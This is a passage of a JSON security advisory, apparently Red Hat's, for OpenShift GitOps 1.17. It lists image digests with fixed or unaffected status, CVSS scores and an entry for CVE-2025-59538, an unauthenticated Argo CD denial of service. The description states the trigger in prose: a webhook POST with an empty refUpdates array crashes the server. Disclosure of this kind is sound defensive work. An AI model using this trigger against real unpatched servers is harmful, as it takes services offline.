"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:54f6d32f5aa8ad998eb98ef2035b7593704cca8db98251ff77405801920e324b_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:9ef69c345cfa9198e4d56366946741f83413e0cc1e63a95104a5dd476805e78d_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:b9125f40d94e6aa05df7814a23d47e904ccee9f5204ebcfd994f9432b3feb0fb_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:c7b52016e71fc0b1118e0253840f261c0d21a64a9135b5f7971cb6dab3dcc285_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:8fd8642fc3d8133141119dd425bc78bb57be51360cb3c28cc1b54968e79b6b55_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:a4b698bd79e935b61cfc559ac512fd1e634d6f347a6afe335161de3325a164ab_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:a85ac1be1b1879662d4cec1033d6916f4c142221282aff09113383ba236a2bdb_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:af6d72cac08a08cc48d446e426fe1e34e21d71a7779dafdbea08173be063149f_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:439fef0be72eb98010e262668a420425c4b74924c3a929dcbac987de1341d8e6_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:47c66c140471b49a4e95bc25788d261e8951eeec2a55ea5d07b8a3670a393ef6_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:64d8c57090f88ebd3671a390e1b1956f799cda24c85e978d8f937f302ceb40f5_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:ba88e66dc3f39019be91230d122ee73e0b0b931a6d3c7d7130f2a7dbb0d4c553_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-operator-bundle@sha256:4fc82c51692138acd9a7232fc4b3451cbca9f7be763452c811bea7a68867cb93_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:5cdb2206120407d94f409ebb2639c5b61679df14be99d60db25703ab9f9b3ef4_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:689a9a102c8087e3adf3646dc686647cb6197df3524cab1db6ba94e618c55282_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:a85eb07d72178b495f77ed1566f3ec72969fdc8acf83b2e847e7c393739ee459_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:cbbc245f3f5be44aff1e09b209c814bb7128b53d2530b17c02c4b810fe682787_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:0c32ee1204ce384bf91892ddc887e9eff7059242f387c614ca6049c9c0392c4e_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:1cd978e7d7fbf499996c6f2da908ee77a07f5fe229b4424b7f48ee94f142e4ab_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:ac34135ee63849e8620c33cfdd619f810d87d07d2ba9ca35c0932bdbf1e1d6cc_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:d3f6398dc0b730251e2cac7826c14cca18324ce6854d7844aad43ebc22a1c7ec_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:2bfd51f1bee622faddee3acd58f372c0b3b4db406ffabeae84677b091e364a53_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:36ce4a97fb4a83ee3aec72957c2bb028f35e5adc3c936c2786970ff7562c0783_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:87add4524478a000579bc7caa048946e2bf2ca65886da0dd032c4be455d78fc8_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:c9ec61f94b616f0dff0c0aa0de9d719449a6d24e77b4ac2af760098af5328523_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:a03e72ceb733c34a4788d294d14f0e4ee0e03e2b509a4f7e78f4abebe4d8224a_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:a0686e82d2d203e6af794691ba50101aa9a1fb049523cc50aa0a870bdcae4113_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:c28cabf7a7e417448c23bed8741d86cec7a60b70598672a8766279ea67a7d570_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:e5c9119e2417f4085ad78a71653ec1653096923672d03b4d8a384334dca20a90_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:1dd0c50f25497541f3b4e35b802ed9110987870d38960bda7d530436f7875e73_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:1f35c7ec22e6cb4c4d1e5da664a4b4fdd6e4b9fe98c93e9f5f6e9b16dcc12ff5_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:a182f8ec61c4dc5f32a87750e28b792d0ff3b666ae9d67a39ac9dc6e2bc84e5e_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:a73d1a81029d39de7900b5c52f22bcb57188d973391c4a2f81bbde612b9185fb_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:1eb401fa44278a8558d45167b3d2507fac77521a2fb322bb66012d4cdfec87b6_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:5109b457be26c5d03311c5fa52f43d4db7606ecae58360a479fa8562d808fadc_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:b6c7ce8543542a2943498c7cc5f3be103493d7c8a3055dfbfe4b468285542cc7_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:faa950d8512bc45382646c6c7d403ebf91fcd47d8ca65f4124fed91e77bebf2e_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:12e0ab863663d47e2a483839e000eb8fa624bd5766bf706213db295a0e00815f_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:4b3765fa97fcf85c39a17e88712fdd1bfa158a8677f714e862d35cadedeeda62_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:99403da3c050737dbda083bb11d413b317fa2cb7143ee4ce0125fb6ad44ca184_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:a2339147b13271b43dfd58901f09ed024a5f8d1ad1def8639c416710d68f1ca3_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:54f6d32f5aa8ad998eb98ef2035b7593704cca8db98251ff77405801920e324b_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:9ef69c345cfa9198e4d56366946741f83413e0cc1e63a95104a5dd476805e78d_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:b9125f40d94e6aa05df7814a23d47e904ccee9f5204ebcfd994f9432b3feb0fb_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:c7b52016e71fc0b1118e0253840f261c0d21a64a9135b5f7971cb6dab3dcc285_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:8fd8642fc3d8133141119dd425bc78bb57be51360cb3c28cc1b54968e79b6b55_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:a4b698bd79e935b61cfc559ac512fd1e634d6f347a6afe335161de3325a164ab_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:a85ac1be1b1879662d4cec1033d6916f4c142221282aff09113383ba236a2bdb_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:af6d72cac08a08cc48d446e426fe1e34e21d71a7779dafdbea08173be063149f_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:439fef0be72eb98010e262668a420425c4b74924c3a929dcbac987de1341d8e6_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:47c66c140471b49a4e95bc25788d261e8951eeec2a55ea5d07b8a3670a393ef6_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:64d8c57090f88ebd3671a390e1b1956f799cda24c85e978d8f937f302ceb40f5_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:ba88e66dc3f39019be91230d122ee73e0b0b931a6d3c7d7130f2a7dbb0d4c553_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-operator-bundle@sha256:4fc82c51692138acd9a7232fc4b3451cbca9f7be763452c811bea7a68867cb93_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:5cdb2206120407d94f409ebb2639c5b61679df14be99d60db25703ab9f9b3ef4_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:689a9a102c8087e3adf3646dc686647cb6197df3524cab1db6ba94e618c55282_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:a85eb07d72178b495f77ed1566f3ec72969fdc8acf83b2e847e7c393739ee459_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:cbbc245f3f5be44aff1e09b209c814bb7128b53d2530b17c02c4b810fe682787_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:0c32ee1204ce384bf91892ddc887e9eff7059242f387c614ca6049c9c0392c4e_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:1cd978e7d7fbf499996c6f2da908ee77a07f5fe229b4424b7f48ee94f142e4ab_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:ac34135ee63849e8620c33cfdd619f810d87d07d2ba9ca35c0932bdbf1e1d6cc_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:d3f6398dc0b730251e2cac7826c14cca18324ce6854d7844aad43ebc22a1c7ec_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:2bfd51f1bee622faddee3acd58f372c0b3b4db406ffabeae84677b091e364a53_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:36ce4a97fb4a83ee3aec72957c2bb028f35e5adc3c936c2786970ff7562c0783_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:87add4524478a000579bc7caa048946e2bf2ca65886da0dd032c4be455d78fc8_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:c9ec61f94b616f0dff0c0aa0de9d719449a6d24e77b4ac2af760098af5328523_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "github.com/argoproj/argo-cd: Argo CD unauthenticated Denial of Service"
},
{
"cve": "CVE-2025-59538",
"cwe": {
"id": "CWE-703",
"name": "Improper Check or Handling of Exceptional Conditions"
},
"discovery_date": "2025-10-01T22:00:57.544949+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:a03e72ceb733c34a4788d294d14f0e4ee0e03e2b509a4f7e78f4abebe4d8224a_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:a0686e82d2d203e6af794691ba50101aa9a1fb049523cc50aa0a870bdcae4113_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:c28cabf7a7e417448c23bed8741d86cec7a60b70598672a8766279ea67a7d570_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:e5c9119e2417f4085ad78a71653ec1653096923672d03b4d8a384334dca20a90_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:1dd0c50f25497541f3b4e35b802ed9110987870d38960bda7d530436f7875e73_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:1f35c7ec22e6cb4c4d1e5da664a4b4fdd6e4b9fe98c93e9f5f6e9b16dcc12ff5_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:a182f8ec61c4dc5f32a87750e28b792d0ff3b666ae9d67a39ac9dc6e2bc84e5e_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:a73d1a81029d39de7900b5c52f22bcb57188d973391c4a2f81bbde612b9185fb_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:1eb401fa44278a8558d45167b3d2507fac77521a2fb322bb66012d4cdfec87b6_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:5109b457be26c5d03311c5fa52f43d4db7606ecae58360a479fa8562d808fadc_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:b6c7ce8543542a2943498c7cc5f3be103493d7c8a3055dfbfe4b468285542cc7_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:faa950d8512bc45382646c6c7d403ebf91fcd47d8ca65f4124fed91e77bebf2e_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:8fd8642fc3d8133141119dd425bc78bb57be51360cb3c28cc1b54968e79b6b55_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:a4b698bd79e935b61cfc559ac512fd1e634d6f347a6afe335161de3325a164ab_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:a85ac1be1b1879662d4cec1033d6916f4c142221282aff09113383ba236a2bdb_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:af6d72cac08a08cc48d446e426fe1e34e21d71a7779dafdbea08173be063149f_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:439fef0be72eb98010e262668a420425c4b74924c3a929dcbac987de1341d8e6_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:47c66c140471b49a4e95bc25788d261e8951eeec2a55ea5d07b8a3670a393ef6_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:64d8c57090f88ebd3671a390e1b1956f799cda24c85e978d8f937f302ceb40f5_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:ba88e66dc3f39019be91230d122ee73e0b0b931a6d3c7d7130f2a7dbb0d4c553_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:0c32ee1204ce384bf91892ddc887e9eff7059242f387c614ca6049c9c0392c4e_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:1cd978e7d7fbf499996c6f2da908ee77a07f5fe229b4424b7f48ee94f142e4ab_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:ac34135ee63849e8620c33cfdd619f810d87d07d2ba9ca35c0932bdbf1e1d6cc_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:d3f6398dc0b730251e2cac7826c14cca18324ce6854d7844aad43ebc22a1c7ec_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:2bfd51f1bee622faddee3acd58f372c0b3b4db406ffabeae84677b091e364a53_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:36ce4a97fb4a83ee3aec72957c2bb028f35e5adc3c936c2786970ff7562c0783_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:87add4524478a000579bc7caa048946e2bf2ca65886da0dd032c4be455d78fc8_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:c9ec61f94b616f0dff0c0aa0de9d719449a6d24e77b4ac2af760098af5328523_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2400940"
}
],
"notes": [
{
"category": "description",
"text": "Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. For versions 2.9.0-rc1 through 2.14.19, 3.0.0-rc1 through 3.2.0-rc1, 3.1.6 and 3.0.17, when the webhook.azuredevops.username and webhook.azuredevops.password are not set in the default configuration, the /api/webhook endpoint crashes the entire argocd-server process when it receives an Azure DevOps Push event whose JSON array resource.refUpdates is empty. The slice index [0] is accessed without a length check, causing an index-out-of-range panic. A single unauthenticated HTTP POST is enough to kill the process. This issue is resolved in versions 2.14.20, 3.2.0-rc2, 3.1.8 and 3.0.19.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "github.com/argoproj/argo-cd: Argo CD unauthenticated Remote Denial of Service",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The availability risk of this vulnerability is limited to the Argo-CD application. General host availability is not at risk.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:12e0ab863663d47e2a483839e000eb8fa624bd5766bf706213db295a0e00815f_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:4b3765fa97fcf85c39a17e88712fdd1bfa158a8677f714e862d35cadedeeda62_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:99403da3c050737dbda083bb11d413b317fa2cb7143ee4ce0125fb6ad44ca184_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:a2339147b13271b43dfd58901f09ed024a5f8d1ad1def8639c416710d68f1ca3_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:54f6d32f5aa8ad998eb98ef2035b7593704cca8db98251ff77405801920e324b_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:9ef69c345cfa9198e4d56366946741f83413e0cc1e63a95104a5dd476805e78d_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:b9125f40d94e6aa05df7814a23d47e904ccee9f5204ebcfd994f9432b3feb0fb_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:c7b52016e71fc0b1118e0253840f261c0d21a64a9135b5f7971cb6dab3dcc285_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-operator-bundle@sha256:4fc82c51692138acd9a7232fc4b3451cbca9f7be763452c811bea7a68867cb93_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:5cdb2206120407d94f409ebb2639c5b61679df14be99d60db25703ab9f9b3ef4_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:689a9a102c8087e3adf3646dc686647cb6197df3524cab1db6ba94e618c55282_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:a85eb07d72178b495f77ed1566f3ec72969fdc8acf83b2e847e7c393739ee459_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:cbbc245f3f5be44aff1e09b209c814bb7128b53d2530b17c02c4b810fe682787_amd64"
],
"known_not_affected": [
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:a03e72ceb733c34a4788d294d14f0e4ee0e03e2b509a4f7e78f4abebe4d8224a_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:a0686e82d2d203e6af794691ba50101aa9a1fb049523cc50aa0a870bdcae4113_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:c28cabf7a7e417448c23bed8741d86cec7a60b70598672a8766279ea67a7d570_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:e5c9119e2417f4085ad78a71653ec1653096923672d03b4d8a384334dca20a90_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:1dd0c50f25497541f3b4e35b802ed9110987870d38960bda7d530436f7875e73_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:1f35c7ec22e6cb4c4d1e5da664a4b4fdd6e4b9fe98c93e9f5f6e9b16dcc12ff5_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:a182f8ec61c4dc5f32a87750e28b792d0ff3b666ae9d67a39ac9dc6e2bc84e5e_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:a73d1a81029d39de7900b5c52f22bcb57188d973391c4a2f81bbde612b9185fb_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:1eb401fa44278a8558d45167b3d2507fac77521a2fb322bb66012d4cdfec87b6_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:5109b457be26c5d03311c5fa52f43d4db7606ecae58360a479fa8562d808fadc_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:b6c7ce8543542a2943498c7cc5f3be103493d7c8a3055dfbfe4b468285542cc7_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:faa950d8512bc45382646c6c7d403ebf91fcd47d8ca65f4124fed91e77bebf2e_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:8fd8642fc3d8133141119dd425bc78bb57be51360cb3c28cc1b54968e79b6b55_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:a4b698bd79e935b61cfc559ac512fd1e634d6f347a6afe335161de3325a164ab_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:a85ac1be1b1879662d4cec1033d6916f4c142221282aff09113383ba236a2bdb_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:af6d72cac08a08cc48d446e426fe1e34e21d71a7779dafdbea08173be063149f_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:439fef0be72eb98010e262668a420425c4b74924c3a929dcbac987de1341d8e6_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:47c66c140471b49a4e95bc25788d261e8951eeec2a55ea5d07b8a3670a393ef6_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:64d8c57090f88ebd3671a390e1b1956f799cda24c85e978d8f937f302ceb40f5_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:ba88e66dc3f39019be91230d122ee73e0b0b931a6d3c7d7130f2a7dbb0d4c553_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:0c32ee1204ce384bf91892ddc887e9eff7059242f387c614ca6049c9c0392c4e_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:1cd978e7d7fbf499996c6f2da908ee77a07f5fe229b4424b7f48ee94f142e4ab_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:ac34135ee63849e8620c33cfdd619f810d87d07d2ba9ca35c0932bdbf1e1d6cc_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:d3f6398dc0b730251e2cac7826c14cca18324ce6854d7844aad43ebc22a1c7ec_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:2bfd51f1bee622faddee3acd58f372c0b3b4db406ffabeae84677b091e364a53_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:36ce4a97fb4a83ee3aec72957c2bb028f35e5adc3c936c2786970ff7562c0783_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:87add4524478a000579bc7caa048946e2bf2ca65886da0dd032c4be455d78fc8_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:c9ec61f94b616f0dff0c0aa0de9d719449a6d24e77b4ac2af760098af5328523_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-59538"
},
{
"category": "external",
"summary": "RHBZ#2400940",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2400940"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-59538",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-59538"
},
{
"category": "external",
